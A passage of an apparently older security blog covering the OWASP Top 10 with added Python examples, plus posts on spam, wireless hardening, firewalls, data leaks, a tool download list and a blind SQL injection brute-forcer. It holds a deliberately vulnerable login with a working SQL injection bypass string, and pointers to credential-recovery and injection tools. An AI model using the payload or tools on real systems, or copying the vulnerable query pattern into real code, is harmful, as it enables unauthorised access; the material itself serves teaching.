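    print(render_comment_vulnerable(PAYLOAD))
    print(render_comment(PAYLOAD))
    print(render_search_link(ATTR_PAYLOAD))
    print(is_valid_username("alice_01"), is_valid_username(PAYLOAD))
```

Encoding is context dependent: html.escape is right for element content and quoted attributes, but would be wrong inside a JavaScript string or a URL, which is why the link renderer uses a different encoder.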


2. Injection flaws

The problem: When user-supplied data is sent to an interpreter as part of a command or query, hackers can trick the interpreter, which executes text-based commands, into running unintended commands. Injection flaws allow attackers to create, read, update or delete any arbitrary data available to the application, OWASP writes. In the worst case, these flaws allow an attacker to completely compromise the application and the underlying systems, even bypassing deeply nested firewalled environments.

Real-world example: Russian hackers broke into a Rhode Island government Web site to steal credit card data in January 2006. Hackers claimed the SQL injection attack stole 53,000 credit card numbers, while the hosting service provider claims it was only 4,113.

How to protect users: Avoid using interpreters if possible. If you must invoke one, the key to avoiding injection is the use of safe APIs, such as strongly typed parameterized queries and object-relational mapping libraries, OWASP writes.
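The classic SQL case, as an added example in Python with the standard library’s sqlite3 (not code from the post or from OWASP). The vulnerable login builds the query by string formatting, so the interpreter cannot tell where the data ends and the command begins; the safe login sends the same query with parameters. The users table and its rows are constructed, and the passwords are stored in the clear only to keep the example short.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory database with constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, username: str, password: str) -> bool:
    # The text-based command is assembled from user input: quotes in the input change the command.
    sql = f"SELECT id FROM users WHERE username = '{username}' AND password = '{password}'"
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username: str, password: str) -> bool:
    # Parameterized query: the SQL text is fixed, and the values travel separately as typed
    # parameters, so a quote in the input is just a quote in the data.
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# Constructed payload. Used for both fields it turns the vulnerable WHERE clause into
#   username = '' OR '1'='1' AND password = '' OR '1'='1'
# which is true for every row.
PAYLOAD = "' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, real creds :", login_vulnerable(db, "alice", "s3cret"))
    print("vulnerable, payload    :", login_vulnerable(db, PAYLOAD, PAYLOAD))
    print("safe, real creds       :", login_safe(db, "alice", "s3cret"))
    print("safe, payload          :", login_safe(db, PAYLOAD, PAYLOAD))
```

Escaping quotes by hand would close this particular hole but not the general problem (numeric fields, LIKE patterns, identifiers); parameterization works because the database receives the query structure and the data over separate channels.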


3. Malicious file execution

The problem: Hackers can achieve remote code execution, remote installation of rootkits, or complete compromise of a system. Any type of Web application is vulnerable if it accepts filenames or files from users. The vulnerability may be most common with PHP, a widely used scripting language for Web development.

Real-world example: A teenage programmer discovered in 2002 that Guess.com was vulnerable to attacks that could steal more than 200,000 customer records from the Guess database, including names, credit card numbers and expiration dates. Guess agreed to upgrade its information security the next year after being investigated by the Federal Trade Commission.

How to protect users: Don’t use user-supplied input in any filename for server-based resources, such as images and script inclusions. Set firewall rules to prevent the server from making new connections to external Web sites and internal systems.


4. Insecure direct object reference

The problem: Attackers manipulate direct object references to gain unauthorized access to other objects. It happens when URLs or form parameters contain references to objects such as files, directories, database records or keys.

Banking Web sites commonly use a customer account number as the primary key, and may expose account numbers in the Web interface.

References to database keys are frequently exposed, OWASP writes. An attacker can attack these parameters simply by guessing or searching for another valid key; often they are sequential in nature.

Real-world example: An Australian Taxation Office site was hacked in 2000 by a user who changed a tax ID present in a URL to access details on 17,000 companies. The hacker e-mailed the 17,000 businesses to notify them of the security breach.

How to protect users: Use an index, indirect reference map or another indirect method to avoid exposure of direct object references. If you can't avoid direct references, authorize Web site visitors before using them.
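An added Python example (not the article's or OWASP's code) of an indirect reference map: each session hands out random tokens in place of account numbers, and a token is only resolvable in the session that issued it, so the sequential-guessing attack has nothing to increment. The account table, the owners and the user-keyed session store are constructed for the demo.

```python
import secrets


class ReferenceMap:
    """Per-session map between random opaque tokens and real object IDs."""

    def __init__(self):
        self._by_token = {}
        self._by_id = {}

    def expose(self, real_id):
        # Hand out an unguessable token for a real ID (reused within the session).
        if real_id not in self._by_id:
            token = secrets.token_urlsafe(16)
            self._by_id[real_id] = token
            self._by_token[token] = real_id
        return self._by_id[real_id]

    def resolve(self, token):
        return self._by_token.get(token)


# Constructed sample data: account number -> owner.
ACCOUNTS = {1001: "alice", 1002: "bob"}
SESSIONS = {}   # user -> ReferenceMap (in a real app keyed by session ID)


def account_links(user):
    """Tokens the user sees in URLs instead of raw account numbers."""
    refmap = SESSIONS.setdefault(user, ReferenceMap())
    return [refmap.expose(acct) for acct, owner in ACCOUNTS.items() if owner == user]


def view_account(user, token):
    refmap = SESSIONS.get(user)
    acct = refmap.resolve(token) if refmap else None
    # A token from another session, a raw account number or a guess all miss;
    # the ownership check stays in place as a second line of defence.
    if acct is None or ACCOUNTS.get(acct) != user:
        return None
    return acct


if __name__ == "__main__":
    token = account_links("alice")[0]
    print(view_account("alice", token), view_account("bob", token),
          view_account("bob", "1001"))
```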


5. Cross site request forgery

The problem: Simple and devastating, this attack takes control of the victim's browser while it is logged in to a Web site and sends malicious requests to the Web application. Web sites are extremely vulnerable, partly because they tend to authorize requests based on session cookies or "remember me" functionality. Banks are potential targets.

"Ninety-nine percent of the applications on the Internet are susceptible to cross site request forgery," Williams says. "Has there been an actual exploit where someone's lost money? Probably the banks don't even know. To the bank, all it looks like is a legitimate transaction from a logged-in user."

Real-world example: A hacker known as Samy gained more than a million friends on MySpace.com with a worm in late 2005, automatically including the message "Samy is my hero" in thousands of MySpace pages. The attack itself may not have been that harmful, but it was said to demonstrate the power of combining cross site scripting with cross site request forgery. Another example that came to light one year ago exposed a Google vulnerability allowing outside sites to change a Google user's language preferences.

How to protect users: Don't rely on credentials or tokens automatically submitted by browsers. "The only solution is to use a custom token that the browser will not remember," OWASP writes.
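An added example in Python, not part of the article: a CSRF token derived from the session identifier with an HMAC under a server-side key (the key and the session ID are constructed for the demo). The session cookie arrives with every request automatically; the token has to be in the form body, which a page on another origin cannot read or fill in.

```python
import hashlib
import hmac
import secrets

# Assumed per-deployment secret; a real app loads it from configuration.
SERVER_KEY = secrets.token_bytes(32)


def csrf_token(session_id):
    # Token bound to the session: an attacker's page cannot read it, and the
    # browser never attaches it on its own (unlike the session cookie).
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def handle_transfer(session_id, form):
    """session_id comes from the cookie (sent automatically); the token must
    come from the form body, which only our own page can populate."""
    submitted = form.get("csrf_token", "")
    # Constant-time comparison so the check itself leaks nothing about the token.
    if not hmac.compare_digest(submitted, csrf_token(session_id)):
        return 403, "rejected: missing or invalid CSRF token"
    return 200, "transfer of %s accepted" % form.get("amount")


def demo():
    sid = "session-abc"   # constructed session identifier
    own_form = {"csrf_token": csrf_token(sid), "amount": "100"}
    forged_form = {"amount": "100"}   # what a cross-site POST can supply
    return handle_transfer(sid, own_form)[0], handle_transfer(sid, forged_form)[0]


if __name__ == "__main__":
    print(demo())
```

The forged request carries the victim's valid session cookie and still fails, which is the whole point: the authorization decision no longer rests on something the browser sends by itself.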

6. Information leakage and improper error handling

The problem: Error messages that applications generate and display to users are useful to hackers when they violate privacy or unintentionally leak information about the program's configuration and internal workings.

"Web applications will often leak information about their internal state through detailed or debug error messages. Often, this information can be leveraged to launch or even automate more powerful attacks," OWASP says.

Real-world example: Information leakage goes well beyond error handling, applying also to breaches occurring when confidential data is left in plain sight. The ChoicePoint debacle in early 2005 thus falls somewhere in this category. The records of 163,000 consumers were compromised after criminals pretending to be legitimate ChoicePoint customers sought details about individuals listed in the company's database of personal information. ChoicePoint subsequently limited its sales of information products containing sensitive data.

How to protect users: Use a testing tool such as OWASP's WebScarab Project to see what errors your application generates. "Applications that have not been tested in this way will almost certainly generate unexpected error output," OWASP writes.
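An added Python example, not from the article: one request handler shown in its leaky (debug) form and its production form. The account table is constructed; the short error reference is what ties the generic client-side message to the full exception and stack trace that stay in the server log.

```python
import logging
import uuid

logger = logging.getLogger("app")

# Constructed sample data.
ACCOUNTS = {"1": 50}


def lookup_balance(account_id):
    return ACCOUNTS[account_id]          # raises KeyError for an unknown ID


def handle(account_id, debug=False):
    try:
        return 200, {"balance": lookup_balance(account_id)}
    except Exception as exc:
        ref = uuid.uuid4().hex[:8]
        # Full detail (exception type, message, stack trace) goes to the
        # server log only, keyed by the reference.
        logger.exception("ref=%s account_id=%r request failed", ref, account_id)
        if debug:
            # The leaky variant: the client learns the exception type and the
            # value that caused it, i.e. how the lookup works internally.
            return 500, {"error": repr(exc), "ref": ref}
        # Production: a generic message plus a reference support can correlate.
        return 500, {"error": "Internal error, reference " + ref}


if __name__ == "__main__":
    print(handle("999", debug=True))
    print(handle("999"))
```

Running the handler with an unknown ID in debug mode returns something like `KeyError('999')`, which tells an attacker that IDs are dictionary keys and that enumeration will be answered precisely; the production branch answers every failure the same way.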


7. Broken authentication and session management

The problem: User and administrative accounts can be hijacked when applications fail to protect credentials and session tokens from beginning to end. Watch out for privacy violations and the undermining of authorization and accountability controls.

"Flaws in the main authentication mechanism are not uncommon, but weaknesses are more often introduced through ancillary authentication functions such as logout, password management, timeout, remember me, secret question and account update," OWASP writes.

Real-world example: In 2002 Microsoft had to eliminate a vulnerability in Hotmail that could have let malicious JavaScript programmers steal user passwords. Revealed by a networking products reseller, the flaw could be triggered by e-mails containing Trojans that altered the Hotmail user interface, forcing users to repeatedly re-enter their passwords and unwittingly send them to hackers.

How to protect users: Both communication and credential storage have to be secure. SSL should be the only option for authenticated parts of the application, and credentials should be stored in hashed or encrypted form.

Another tip: get rid of custom cookies used for authentication or session management.


8. Insecure cryptographic storage

The problem: Many Web developers fail to encrypt sensitive data in storage, even though cryptography is a key part of most Web applications. Even when encryption is present, it's often poorly designed, using inappropriate ciphers.

"These flaws can lead to disclosure of sensitive data and compliance violations," OWASP writes.

Real-world example: The TJX data breach exposed 45.7 million credit and debit card numbers. A Canadian government investigation faulted TJX for failing to upgrade its data encryption system before it was targeted by electronic eavesdropping starting in July 2005.

How to protect users: Don't invent your own cryptographic algorithms. "Only use approved public algorithms such as AES, RSA public key cryptography, and SHA-256 or better for hashing," OWASP advises.

Furthermore, generate keys offline, and never transmit private keys over insecure channels.
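An added Python example, not from the article or OWASP: password storage built on SHA-256 through PBKDF2 with a random per-user salt and an iteration count (the count used here is an assumed value), next to the unsalted digest that a rainbow table breaks. Generating AES or RSA keys is a separate matter and is not shown.

```python
import base64
import hashlib
import hmac
import os

ITERATIONS = 100_000   # assumed work factor; raise it as hardware gets faster


def hash_password(password, iterations=ITERATIONS):
    # Random per-user salt: identical passwords give different hashes, which
    # defeats precomputed (rainbow) tables; the iterations slow brute force.
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (
        iterations, base64.b64encode(salt).decode(), base64.b64encode(dk).decode())


def verify_password(password, stored):
    algo, iters, salt_b64, dk_b64 = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(dk_b64)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iters))
    return hmac.compare_digest(candidate, expected)


def unsalted_sha256(password):
    # The weak form: the same input always gives the same digest, so one
    # precomputed table breaks every user who chose that password.
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


if __name__ == "__main__":
    stored = hash_password("correct horse")
    print(stored)
    print(verify_password("correct horse", stored), verify_password("wrong", stored))
    print(unsalted_sha256("x") == unsalted_sha256("x"))
```

The stored string carries the algorithm, the iteration count and the salt alongside the derived key, so the count can be raised later for new passwords without breaking verification of old ones.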


9. Insecure communications

The problem: Similar to No. 8, this is a failure to encrypt network traffic when it's necessary to protect sensitive communications. Attackers can access unprotected conversations, including transmissions of credentials and sensitive information. For this reason, PCI standards require encryption of credit card information transmitted over the Internet.

Real-world example: TJX again. Investigators believe hackers used a telescope-shaped antenna and laptop computer to steal data exchanged wirelessly between portable price-checking devices, cash registers and store computers, the Wall Street Journal reported.

The $17.4-billion retailer's wireless network had less security than many people have on their home networks, the Journal wrote. TJX was using WEP encryption, which had already been broken for years, rather than the more robust WPA.

How to protect users: Use SSL on any authenticated connection or during the transmission of sensitive data, such as user credentials, credit card details, health records and other private information. SSL or a similar encryption protocol should also be applied to client, partner, staff and administrative access to online systems. Use transport layer security or protocol level encryption to protect communications between parts of your infrastructure, such as Web servers and database systems.


10. Failure to restrict URL access

The problem: Some Web pages are supposed to be restricted to a small subset of privileged users, such as administrators. Yet often there's no real protection of these pages, and hackers can find the URLs by making educated guesses. Say a URL refers to an ID number such as 123456. "A hacker might say, I wonder what's in 123457?" Williams says.

The attacks targeting this vulnerability are called forced browsing, "which encompasses guessing links and brute force techniques to find unprotected pages," OWASP says.

Real-world example: A hole on the Macworld Conference & Expo Web site this year let users get Platinum passes worth nearly $1,700 and special access to a Steve Jobs keynote speech, all for free. The flaw was code that evaluated privileges on the client but not on the server, letting people grab free passes via JavaScript on the browser, rather than the server.

How to protect users: Don't assume users will be unaware of hidden URLs. All URLs and business functions should be protected by an effective access control mechanism that verifies the user's role and privileges. "Make sure this is done every step of the way, not just once towards the beginning of any multi-step process," OWASP advises.
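An added Python example (not from the article) of a per-request role check that denies any URL not in the route table, plus a server-side record of which checkout step the user has completed so the final step cannot be reached by typing its URL. The route table, roles and step names are assumed for the demo.

```python
# Assumed route table: which roles may reach which URL. Anything not listed
# is denied, so a "hidden" URL is never accidentally public.
ROUTES = {
    "/admin/users":      {"admin"},
    "/checkout/step1":   {"customer", "admin"},
    "/checkout/step2":   {"customer", "admin"},
    "/checkout/confirm": {"customer", "admin"},
}
PUBLIC = {"/", "/login"}
CHECKOUT_STEPS = ["/checkout/step1", "/checkout/step2", "/checkout/confirm"]


def authorize(user, path):
    if path in PUBLIC:
        return True
    allowed = ROUTES.get(path)
    if allowed is None or user is None:
        return False          # deny by default
    return user["role"] in allowed


def handle(user, path, session):
    """Check the role on every request, then check step order on the server
    side so a client cannot jump straight to the step that issues the pass."""
    if not authorize(user, path):
        return 403
    if path in CHECKOUT_STEPS:
        idx = CHECKOUT_STEPS.index(path)
        # The session, not the browser, records how far the user really got.
        if idx > 0 and session.get("checkout_step", -1) < idx - 1:
            return 400        # forced browsing past a required step
        session["checkout_step"] = idx
    return 200


if __name__ == "__main__":
    customer = {"role": "customer"}
    s = {}
    print(handle(customer, "/checkout/confirm", s))   # skipped steps
    print(handle(customer, "/checkout/step1", s),
          handle(customer, "/checkout/step2", s),
          handle(customer, "/checkout/confirm", s))
    print(handle(customer, "/admin/users", {}))
```

The Macworld flaw above is exactly the case this guards against: the privilege decision was made in the browser, so the server had no record of its own to consult.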

What is spam?

Spam, unsolicited bulk advertising via email, made its first appearance in the mid-1990s, as soon as enough people were using email to make it a cost-effective form of advertising. By 1997 spam was considered a problem, and the first Real-Time Black List (RBL) appeared the same year. Spammer techniques have developed in response to the appearance of more and better filters: as soon as security firms produce effective filters, spammers change tactics to get past them, and the profits are re-invested in techniques to evade the next generation of filters. In order to combat spam effectively it is essential to define exactly what spam is. Many people believe that spam is simply unsolicited email, but that definition is not quite right: spam is anonymous, unsolicited bulk email.


Definition of spam in detail:

* Anonymous: real spam is sent with spoofed or harvested sender addresses to hide the actual sender.
* Mass mailing: real spam is sent in bulk. Spammers make money from the small percentage of recipients who actually respond, so for spam to be cost-effective the initial mailings have to be high-volume.
* Unsolicited: mailing lists, newsletters and other advertising material that end users have chosen to receive may resemble spam but are legitimate mail. The same message can therefore be classed as spam for one recipient and as legitimate mail for another, depending on whether the user elected to receive it.

Note that the words 'advertising' and 'commercial' are not part of the definition. Many spam messages neither advertise anything nor carry a commercial proposition. Besides offers of goods and services, spam mailings fall into kinds such as political messages, quasi-charity appeals, financial scams, chain letters, fake spam and unsolicited but legitimate messages. A legitimate commercial proposition, a charity appeal, an invitation addressed personally to an existing contact or a newsletter can certainly be unsolicited mail, but it is not spam. Legitimate unsolicited messages also include delivery failure messages, misdirected messages, messages from system administrators and even messages from old friends who have never before written to the recipient by email.


Conclusion:

Because unsolicited correspondence may be of interest to the recipient, a good anti-spam solution should be able to distinguish between true spam (unsolicited bulk mailings) and other unsolicited correspondence. The latter should be flagged as 'possible spam' so it can be reviewed or deleted at the recipient's convenience. Companies should have a spam policy, with system administrators assessing the needs of different departments and giving different user groups access to different unsolicited-mail folders based on that assessment. For instance, the travel manager may well want to read travel ads, while the HR department may wish to see all invitations to seminars and training sessions. Spammers usually combine these techniques in various ways, and many anti-spam products cannot detect all of them. As long as spamming remains profitable, users with poor-quality anti-spam software will continue to find their mailboxes clogged with advertising.

Securing your wireless connection

Step one:

Out of the box your wireless device broadcasts itself as far as it can: it is there and it wants to be found as easily as possible. The first thing to do is change the Service Set Identifier (SSID). Anyone with a computer can look up the default SSID for a given make of router. Each wireless network node needs to be configured with the SSID name; the access point announces it in its beacon frames and a client must present the correct SSID when it associates, otherwise it is rejected. Bear in mind that the SSID is a network name, not a secret: any wireless sniffer sees it in probe and association frames, so changing it gets you out of the default lists but is not a security control on its own.

Step two:

Turn off SSID broadcasting. This stops the access point advertising the name in its beacons; a sniffer still sees it whenever a client connects, so treat this as hiding rather than protection.

Step three:

Enable MAC address filtering. This limits access to your wireless network to a white list of accepted MAC (hardware) addresses, one per network card. Keep in mind that MAC addresses travel unencrypted in every frame and are trivial to clone, so this too only raises the bar slightly.


Step four:

Use the most up-to-date encryption, WPA2. The explanation is rather long; just know that it is the most secure option, and that WEP (see the TJX story above) is broken and should not be used at all.

Step five:

When setting the passphrase, apply the same rules as for any other password: upper- and lowercase letters, numbers and special characters, minimum of 8 characters. For WPA2-PSK a much longer passphrase (it can be up to 63 characters) is worth the trouble, because an attacker who captures the handshake can run a dictionary attack against it offline, where no lockout applies.


Rise in SQL injection attacks exploiting unverified user data input

Microsoft is aware of a recent escalation in a class of attacks targeting Web sites that use Microsoft ASP and ASP.NET technologies but do not follow best practices for secure Web application development. These SQL injection attacks do not exploit a specific software vulnerability, but instead target Web sites that do not follow secure coding practices for accessing and manipulating data stored in a relational database. When a SQL injection attack succeeds, an attacker can compromise data stored in these databases and possibly execute remote code. Clients browsing to a compromised server could be forwarded unknowingly to malicious sites that may install malware on the client machine.

This vulnerability is not exploitable in Web applications that follow generally accepted best practices for secure Web application development by verifying user data input.

Microsoft has identified several tools to assist administrators. These tools cover detection, defense, and identifying possible coding which may be exploited by an attacker.
  • Detection – HP Scrawlr - Hewlett Packard has developed a free scanner which can identify whether sites are susceptible to SQL injection. This tool and support for its use can be found at Finding SQL Injection with Scrawlr.
  • Defense – UrlScan version 3.0 Beta - UrlScan version 3.0 Beta is a Microsoft security tool that restricts the types of HTTP requests that Internet Information Services (IIS) will process. By blocking specific HTTP requests, UrlScan helps prevent potentially harmful requests from reaching the Web application on the server. UrlScan 3.0 will install on IIS 5.1 and later, including IIS 7.0. It filters requests at the IIS layer and reduces exposure; it is not a substitute for parameterized queries in the application itself.
  • Identifying – Microsoft Source Code Analyzer for SQL Injection - A SQL Source Code Analysis Tool has been developed. This tool can be used to detect ASP code susceptible to SQL injection attacks.

What firewalls do and don’t do

Over the last few years, security threats to companies have grown and altered dramatically and so have the defences. Traditional firewalls, installed over three years ago, are often not best suited for current threats and don’t protect against a number of newer threats.

What firewalls do

A firewall is a system designed to prevent unauthorised access to or from a private computer network. Firewalls are frequently used to prevent unauthorised Internet users from accessing private networks connected to the Internet (often described as intranets). All messages entering or leaving the intranet pass through the firewall, which examines each message and blocks those that do not meet the specified security criteria.

You need a firewall to protect your confidential information from those not authorised to access it and to protect against malicious users and accidents that originate outside your network. One of the most important elements of a firewall is its access control features, which distinguish between good and bad traffic.

There are various types of firewall. In ascending order, they are:

* Packet layer (packet filter)
This inspects individual packets using their network- and transport-layer headers: source and destination addresses, ports and flags.

* Circuit level
This validates TCP session set-up and tracks whether a packet belongs to an established connection, without inspecting its content.

* Application layer
This inspects application-protocol content (HTTP, SMTP and so on) for validity before passing it on.

* Proxy server
This terminates connections itself and relays all messages entering or leaving the network on behalf of the clients.

In the real world, threats have evolved over the years and firewalls have evolved to deal with them. While it is still possible to buy packet only firewalls, they are not adequate for business use. Protection against combination threats is best provided by firewalls which combine all of the above elements.

Specific functions performed by firewalls include:
* Gateway defence
* Carrying out defined security policies
* Segregating activity between your trusted network, the Internet and your DMZ ( a protected zone midway between your network and the Internet, where you would perhaps have your web or email server).
* Hiding and protecting your internal network addresses (NAT)
* Reporting on threats and activity.

What firewalls don’t do

Even with a firewall, there are still many areas of risk for your network. The most obvious is malware. Malware is a combination of the words 'malicious' and 'software' and includes viruses, trojan horses, worms and spyware/adware; phishing and pharming (see below) are the tricks most often used to deliver it or to steal credentials outright. Malware is most commonly acquired through clicking on email attachments and email links.

Viruses, trojans and worms can cause a range of symptoms from the annoying and/or embarrassing to the much more serious which can affect the functioning of your business. Spyware/adware gathers information about you. It can record keystrokes and, as such, can potentially be very dangerous, revealing everything you do on your computer.

Another well-known threat, not covered by your firewall, is SPAM. Dealing with SPAM can seriously affect your productivity and, as SPAM often contains viruses and phishing emails, it is also a direct security threat.

Phishing is about fake emails trying to extract sensitive information, such as your bank passwords or credit card details and a variation of this is pharming, where the criminal sets up a fake web site which looks like one you normally use, typically a banking site. Once you enter your details, the criminal is able to plunder your account.

Many people are also unaware that you can actually acquire malware by simply browsing web sites. This is a rapidly growing threat and some of the malware is used to create Botnets (see below). Some security applications (e.g. those from Finjan) have a facility which protects you against web sites containing malware, by checking the sites before you click on them.

Another danger to your network is a DDoS (distributed denial of service) attack, a malicious attempt to stop an organisation using its Internet-based systems by flooding them with traffic (connection requests, packets or email) until the servers are overwhelmed. These attacks are often carried out by botnets, networks of compromised PCs that are also used in SPAM campaigns. Specific DDoS mitigation products and services can guard against this threat.

Other dangers to your network include unauthorised access, and the way to deal with this is to have proper authentication procedures in place, for both local and remote access. In many cases, passwords are not enough and the use of strong authentication with tokens provides much better security.

Further potential problems are from data theft or leakage, for example when a laptop is stolen. The answer here is to encrypt all sensitive data. Low cost solutions are available from companies such as Utimaco. Finally all wireless use is risky and requires a specific wireless firewall, and wireless VPN for remote access.

A firewall is no longer enough to protect a company network. Other security solutions to combat the threats outlined above are also necessary, as well as proper staff training.

One of the best ways to protect against the main threats not covered by a firewall is to use a UTM (unified threat management) device. UTM devices are multi-purpose security solutions which have a minimum of a firewall, VPN, anti-virus and intrusion detection/prevention. Some UTMs (sometimes known as super UTMs) also incorporate capabilities such as web filtering (blocking problematic web sites), SPAM blocking and spyware protection.

UTMs are usually lower cost than buying and installing several security components separately. They are also typically greener, as one solution uses much less power than multiple solutions. When buying a UTM or a super UTM, it is important to ensure that your reseller sizes it correctly i.e. ensures that it has the performance capability to deal with current throughput and future business expansion.

Data leaks are a top concern

Trend Micro reported that data leaks are becoming a leading source of headaches for U.S., U.K., German and Japanese companies, according to the results of a study that explores corporate computer users' perceptions of and experiences with security threats.

The study, which surveyed 1,600 corporate end users, found that the loss of proprietary company data and information was ranked as the second most serious threat at work, following viruses. It was considered more serious than most other threats, such as spam, spyware and phishing. Many of those surveyed pointed the finger when it comes to corporate data leaks: while 6 percent of end users admitted to having leaked company information, 16 percent believe other employees caused data leaks. End users in the U.S., U.K. and Germany are more likely to admit to leaking company data, either intentionally or accidentally, than end users in Japan.

Respondents in the U.S. seem to believe they're slightly savvier when it comes to confidentiality - 74 percent of respondents say they know what type of company data is confidential and proprietary compared to 67 percent in the U.K., 68 percent in Germany, and only 40 percent in Japan. On the other hand, end users of large companies in Japan are more aware of what type of company data is confidential compared to end users of smaller organizations. Mobile users are also more confident. In the U.S., for example 79 percent of mobile end users say they know what's classified information compared to 69 percent of desktop computer users.

The study also found that approximately 46 percent of companies do not currently have a policy to prevent data leaks. Companies in Germany and Japan are more likely than UK companies to implement data leak prevention policies. In all countries surveyed, large organizations are more likely to have preventative policies in place than small companies.

Among end users whose company currently has a policy to prevent data leakage, more U.S. end users (nearly 70 percent) report having received training than in the other countries, especially the U.K., where only 57 percent of end users said they received training. In all countries surveyed, installation and use of security software are the most common actions taken to combat data leakage.

Security Tips..

As the number of vacationers taking their laptops and devices poolside increases, so do the risks to corporate data. These devices often contain confidential corporate information that could be seriously compromised if the devices were lost or stolen. This is a pertinent issue for corporations whose employees are accessing sensitive data while on vacation and may inadvertently leave the device behind.

In order to truly ensure the security of confidential data -- even when it is out of the office and going along for the family vacation -- effective DLP strategies and policies need to be deployed.

Safend has devised the top-five tips for ensuring that your employees' 'connected vacations' don't equate to data leaks and corporate headaches.
These tips include:
  • Written Data Security Policies: Effective policies governing access to confidential data are step one in making sure critical data remains in the office even when employees are poolside.
  • Access Control: Put measures in place to know who is allowed to access what data -- in the office or in Venice. For example, only allow files of a certain size and/or certain file types to be copied to thumb drives and other removable media, or only allow data to be copied to a specific device by serial number.
  • Encrypt Everything: Once your files are flying with you to Mexico via your USB stick, encryption is essential to ensure that unauthorized parties can't read them, even if your laptop or device gets lost in baggage claim.
  • Secure Connections: Not every WiFi hot spot around the globe is equipped with the necessary security to ensure your data's integrity. Restricting wireless port access helps keep sensitive data from being pilfered while you sip your latte, awaiting a connecting flight.
  • Necessities Only: Just like that extra swimsuit, do you really need your laptop, USB stick and flash drive? The best way to keep data safe is to only take what you absolutely need.

WirelessKeyView 1.15

WirelessKeyView recovers all wireless network keys (WEP/WPA) stored in your computer by the 'Wireless Zero Configuration' service of Windows XP and by the 'WLAN AutoConfig' service of Windows Vista. It allows you to easily save all keys to text/html/xml file, or copy a single key to the clipboard.

Platform
Win

Language
English

Download Link
9d7ec263366a0e46ad5ffba4017abda7.zip (40.871 KB)

Beyond the hack: protect yourself from sniffing in LAN/WiFi

-Presents a zen based description on security and Sniffer risks that pose while using internet in LAN - WiFi based environment.
-Proof of concept by sniffing plaintext passwords.
-How important is cryptography for the normal user. Why he/she should adopt it.
-The Article is written in non technical and lucid lang.

Platform


Language
English

Download Link
6f63c22a0cee28d7055ed320f9e6a8e0.pdf (340.429 KB)
http://www.greyhatindia.com

Data Guardian 1.3.9

Data Guardian is a secure, Universal Binary, database application for storing passwords, credit card numbers, addresses, notes, customer databases and more. With up to 448-bit encryption and integration with Keychain for auto-form-filling, it is a perfect solution for the web-savvy user as well.

Platform
Win

Language
English

Download Link
92c001846e1eeafd076b34b9bfeca246.exe (5253.494 KB)

Generic Security Service 0.0.23

Generic Security Service (GSS) is an implementation of the Generic Security Service API (GSSAPI). It is used by network applications to provide security services, such as authenticating SMTP/IMAP, via the GSSAPI SASL mechanism. It consists of a library and a manual, and a Kerberos 5 mechanism that supports mutual authentication and the DES and 3DES ciphers.

Platform
Win

Language
English

Download Link
357f4c24834320ee097a3f6bde74ce04.gz (1515.681 KB)

TCP/IP library 5.0

Komodia's TCP/IP library V4.0 (free, open source) is a unique combination of a security oriented library that allows the user to create arbitrary TCP/UDP/IP packets, and a complete communication library solution (for TCP/UDP/ICMP).

Platform
Win

Language
English

Download Link
8e19ea4d002508c26978d443e554c335.zip (717.301 KB)

VBOLock 4

VBOLock is easy to use, easy to implement, powerful copy protection for all of your Visual Basic, Delphi and C++ Builder software applications.

VBOLock binds software protection to your applications and requires very little technical knowledge. This is ideal for the non-technical user or for a developer pushed to meet the closing deadline of a release.

Platform
Win

Language
English

Download Link
21132bc59ee6ddc5ce7ef83d1014dd83.zip (5121.951 KB)

7/2/08

NDR or Backscatter Spam - How Non Delivery Reports Become a Nuisance

You might remember a while ago we mentioned MP3 spam, which in October last year was the latest evolution in spam.

Currently a new type of spam is annoying mail-server owners the world over. It is known as NDR or Backscatter Spam and involves NDRs, or Non Delivery Reports (those emails you get when you send a mail to a non-working or no longer active account).

Research shows that up to 90% of emails received by companies are spam, and spammers have adopted a variety of methods to bypass spam filters used in anti-spam software. In the beginning, spam was mainly text based but over the past few years, spammers have resorted to using embedded images and attaching common file types such as mp3s and Excel documents in emails to gain access to mailboxes. Another option is NDR or non-delivery report spam.

NDRs are a normal part of email exchanges: a user receives one when a message could not be delivered to the recipient's address and the receiving server notifies the sender. Spammers, however, cause a huge increase in NDR traffic because they send junk mail to thousands of addresses at once. Some of those addresses are genuine, others are not, and because the spammer forges the 'From' address to belong to a real domain, every bounce for a non-existent address goes to an innocent user at that domain. The result is email users receiving NDRs for messages they never sent in the first place.

This white paper explains what NDR spam is and how administrators can take effective measures to reduce the impact on their email servers. The key is to avoid generating backscatter in the first place: reject mail for unknown recipients during the SMTP session rather than accepting it and bouncing it later, and treat inbound NDRs for mail your server never sent as the spam they are.

To download a copy of the white paper, please visit:
http://www.gfi.com/whitepapers/ndr-spam.pdf [PDF]

Bsqlbf V2 - Blind SQL Injection Brute Forcer Tool

There are quite a lot of SQL Injection Tools available and now there is one more to add to the stable for testing - Bsqlbf V2, which is a Blind SQL Injection Brute Forcer.

The original tool (bsqlbfv1.2-th.pl) was intended to exploit blind SQL injection against a MySQL backend database; this new version supports blind SQL injection against the following databases:
MS-SQL
MySQL
PostgreSQL
Oracle

It supports injection in string and integer fields. The feature which separates this tool from all other sql injection tools is that it supports custom SQL queries to be supplied with the -sql switch.

It supports 2 modes of attack:
Type 0: Blind SQL Injection based on True and False response
Type 1: Blind SQL Injection based on True and Error response

You can download Bsqlbf V2 here:
bsqlbf-v2.1.zip

Or read more here.
